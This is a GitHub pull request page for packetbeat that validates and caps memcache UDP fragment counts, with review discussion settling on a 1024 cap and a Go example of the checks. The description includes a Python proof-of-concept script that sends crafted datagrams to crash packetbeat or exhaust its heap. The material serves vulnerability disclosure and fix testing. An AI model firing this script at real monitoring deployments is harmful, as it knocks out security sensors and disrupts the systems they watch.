Conversation


@nicholasberlin nicholasberlin commented Dec 2, 2025

Proposed commit message

packetbeat: verify and cap memcache udp fragment counts

Checklist

  • My code follows the style guidelines of this project
  • I have commented my code, particularly in hard-to-understand areas
  • I have made corresponding changes to the documentation
  • I have made corresponding changes to the default configuration files
  • I have added tests that prove my fix is effective or that my feature works. Where relevant, I have used the stresstest.sh script to run them under stress conditions and race detector to verify their stability.
  • I have added an entry in ./changelog/fragments using the changelog tool.

How to test this PR locally

  1. Compile packetbeat

```shell
cd /opt/beats
go build -C packetbeat -o /usr/local/bin/packetbeat
```

  2. Run packetbeat

```shell
packetbeat -e -c packetbeat_memcache_udp.yml
```

  3. Run the following script to trigger the issue:

```python
#!/usr/bin/env python3
"""Send crafted memcache UDP datagrams to trigger Packetbeat bugs."""
import argparse
import socket
import struct
import time


def send_crash(sock, host, port):
    # memcache UDP frame header: requestID, seqNumber, numDatagrams, reserved (big-endian)
    # requestID=0x4242, seqNumber=5, numDatagrams=2 -> out-of-bounds
    header = struct.pack(
        ">HHHH",
        0x4242,  # requestID
        5,       # seqNumber > numDatagrams
        2,       # numDatagrams
        0,       # reserved
    )
    sock.sendto(header + b"A", (host, port))


def send_spray(sock, host, port, count):
    # numDatagrams=65535 -> oversized fragment table per datagram; repeated sends exhaust the heap
    header = struct.pack(
        ">HHHH",
        0x5151,  # requestID
        0,       # seqNumber
        65535,   # numDatagrams
        0,       # reserved
    )
    payload = b"B"
    for _ in range(count):
        sock.sendto(header + payload, (host, port))
        time.sleep(0.05)


def main():
    parser = argparse.ArgumentParser(description=__doc__)
    parser.add_argument("--host", default="127.0.0.1")
    parser.add_argument("--port", default=11211, type=int)
    parser.add_argument(
        "--mode",
        choices=["panic", "spray"],
        default="panic",
        help="panic sends OOB fragment index; spray exhausts heap",
    )
    parser.add_argument(
        "--spray-count",
        type=int,
        default=10,
        help="number of allocations to attempt in spray mode",
    )
    args = parser.parse_args()

    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        if args.mode == "panic":
            send_crash(sock, args.host, args.port)
        else:
            send_spray(sock, args.host, args.port, args.spray_count)
    finally:
        sock.close()


if __name__ == "__main__":
    main()
```

```shell
python3 scripts/trigger_memcache_udp.py --mode panic
```

@nicholasberlin nicholasberlin requested a review from a team as a code owner December 2, 2025 21:27
@botelastic botelastic bot added the needs_team Indicates that the issue/PR needs a Team:* label label Dec 2, 2025
@github-actions
Contributor

github-actions bot commented Dec 2, 2025

🤖 GitHub comments

Just comment with:

  • run docs-build : Re-trigger the docs validation. (use unformatted text in the comment!)

@mergify
Contributor

mergify bot commented Dec 2, 2025

This pull request does not have a backport label.
If this is a bug or security fix, could you label this PR @nicholasberlin? 🙏.
For such, you'll need to label your PR with:

  • The upcoming major version of the Elastic Stack
  • The upcoming minor version of the Elastic Stack (if you're not pushing a breaking change)

To fixup this pull request, you need to add the backport labels for the needed
branches, such as:

  • backport-8./d is the label to automatically backport to the 8./d branch. /d is the digit
  • backport-active-all is the label that automatically backports to all active branches.
  • backport-active-8 is the label that automatically backports to all active minor branches for the 8 major.
  • backport-active-9 is the label that automatically backports to all active minor branches for the 9 major.

@nicholasberlin nicholasberlin added the Team:Security-Linux Platform Linux Platform Team in Security Solution label Dec 2, 2025
@botelastic botelastic bot removed the needs_team Indicates that the issue/PR needs a Team:* label label Dec 2, 2025
@elasticmachine
Contributor

Pinging @elastic/sec-linux-platform (Team:Security-Linux Platform)

@nicholasberlin nicholasberlin added backport-8.19 Automated backport to the 8.19 branch backport-9.1 Automated backport to the 9.1 branch backport-9.2 Automated backport to the 9.2 branch labels Dec 2, 2025
@stanek-michal stanek-michal left a comment

LGTM but change max fragments to 1024

datagrams [][]byte
}

const maxUDPMemcacheFragments = 64
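Review bot: `const maxUDPMemcacheFragments = 64` carries no comment explaining how the value was chosen or what the parser does with a datagram whose numDatagrams exceeds it; add a one-line comment tying the cap to the largest message that must be reassembled (the review discussion settles on 1024 to cover the default 1MB item size) and stating that over-cap datagrams are rejected, so the constant is not retuned blindly later.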

hope it won't be too small, I think we can keep 64

I'm thinking there's no reason to cap it that small. We should cap it to 1024 instead, then all messages will fit from what I see (default max item size is 1MB or so so 1024 fragments cover it)

Contributor Author

sounds good to me: 7327283
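The checks the PR title describes ("verify and cap"), with the 1024 cap agreed in this thread, written out as an added Go example; this is not packetbeat's code, and the names udpHeader, parseUDPHeader and udpMessage are assumed. It rejects both headers the trigger script in the description sends (seqNumber 5 of 2, and 65535 datagrams) before any fragment table is allocated or indexed, and also guards a later fragment of the same request that claims a different total than the one the table was sized from.

```go
package main

import (
	"encoding/binary"
	"fmt"
)

// Cap agreed in review (1024): enough fragments for memcached's default 1MB max item size.
const maxUDPMemcacheFragments = 1024
// udpHeader is the 8-byte big-endian memcache UDP frame header (assumed name).
type udpHeader struct {
	RequestID, SeqNumber, NumDatagrams, Reserved uint16
}

// parseUDPHeader validates the header before any fragment table is allocated or indexed.
func parseUDPHeader(pkt []byte) (udpHeader, error) {
	if len(pkt) < 8 {
		return udpHeader{}, fmt.Errorf("datagram too short for udp header: %d bytes", len(pkt))
	}
	h := udpHeader{
		RequestID:    binary.BigEndian.Uint16(pkt[0:2]),
		SeqNumber:    binary.BigEndian.Uint16(pkt[2:4]),
		NumDatagrams: binary.BigEndian.Uint16(pkt[4:6]),
		Reserved:     binary.BigEndian.Uint16(pkt[6:8]),
	}
	switch {
	case h.NumDatagrams == 0:
		return h, fmt.Errorf("numDatagrams is zero")
	case int(h.NumDatagrams) > maxUDPMemcacheFragments: // stops the spray-mode table allocation
		return h, fmt.Errorf("numDatagrams %d exceeds cap %d", h.NumDatagrams, maxUDPMemcacheFragments)
	case h.SeqNumber >= h.NumDatagrams: // stops the panic-mode out-of-bounds index
		return h, fmt.Errorf("seqNumber %d not below numDatagrams %d", h.SeqNumber, h.NumDatagrams)
	}
	return h, nil
}

// udpMessage collects the fragments of one request; its table is sized once, from a validated count.
type udpMessage struct{ datagrams [][]byte }
// addFragment stores one validated fragment in its sequence slot.
func (m *udpMessage) addFragment(h udpHeader, payload []byte) error {
	if m.datagrams == nil {
		m.datagrams = make([][]byte, h.NumDatagrams) // at most maxUDPMemcacheFragments entries
	}
	// A later fragment may claim a different total; the table length, not its header, bounds the index.
	if int(h.SeqNumber) >= len(m.datagrams) {
		return fmt.Errorf("seqNumber %d outside fragment table of %d", h.SeqNumber, len(m.datagrams))
	}
	m.datagrams[h.SeqNumber] = payload
	return nil
}
```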
